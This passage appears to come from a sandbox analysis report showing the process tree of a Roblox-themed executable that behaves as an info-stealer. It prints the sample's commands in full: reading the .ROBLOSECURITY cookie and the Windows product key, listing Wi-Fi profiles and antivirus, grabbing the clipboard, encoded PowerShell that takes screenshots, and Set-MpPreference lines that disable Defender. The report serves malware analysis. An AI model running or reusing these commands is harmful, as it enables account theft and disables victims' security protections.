wBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
6⤵
- Suspicious use of WriteProcessMemory
PID:224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5396

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y01cex02\y01cex02.cmdline"
8⤵
PID:5976

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES653D.tmp" "c:\Users\Admin\AppData\Local\Temp\y01cex02\CSC85C6FC3CCD244921BB1CE5C96B9EB312.TMP"
9⤵
PID:6112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
- Suspicious use of WriteProcessMemory
PID:5420

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:5724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
- Suspicious use of WriteProcessMemory
PID:5752

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:5840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
- Suspicious use of WriteProcessMemory
PID:5852

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:5924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
PID:5944

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:6024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
6⤵
PID:6040

C:\Windows\system32\tree.com
tree /A /F
7⤵
PID:6092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
6⤵
PID:2260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
6⤵
PID:5308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
6⤵
PID:3160

C:\Windows\system32\getmac.exe
getmac
7⤵
PID:5752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
6⤵
PID:6044

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:6128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
6⤵
PID:6136

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
7⤵
PID:2376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
6⤵
PID:2888

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
7⤵
PID:2808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
6⤵
PID:5552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
6⤵
PID:4812

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
7⤵
- Detects videocard installed
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
6⤵
PID:5124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3536

C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
"C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe"
1⤵
- Executes dropped EXE
PID:3032

C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
"C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5200

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5144

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Nova-Roblox\valid.txt
1⤵
PID:3160

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Nova-Roblox\valid.txt
1⤵
PID:6096

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4032

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Nova-Roblox\valid.txt
1⤵
PID:2520

C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
"C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe"
1⤵
- Executes dropped EXE
PID:5908

C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe
"C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe'"
3⤵
PID:4812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Nova-Roblox\Nova.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:2380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
PID:3448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:3732

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:1544

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:3140

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:3260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
PID:180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:4504

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:5176

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4424

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:5160

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:5144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAf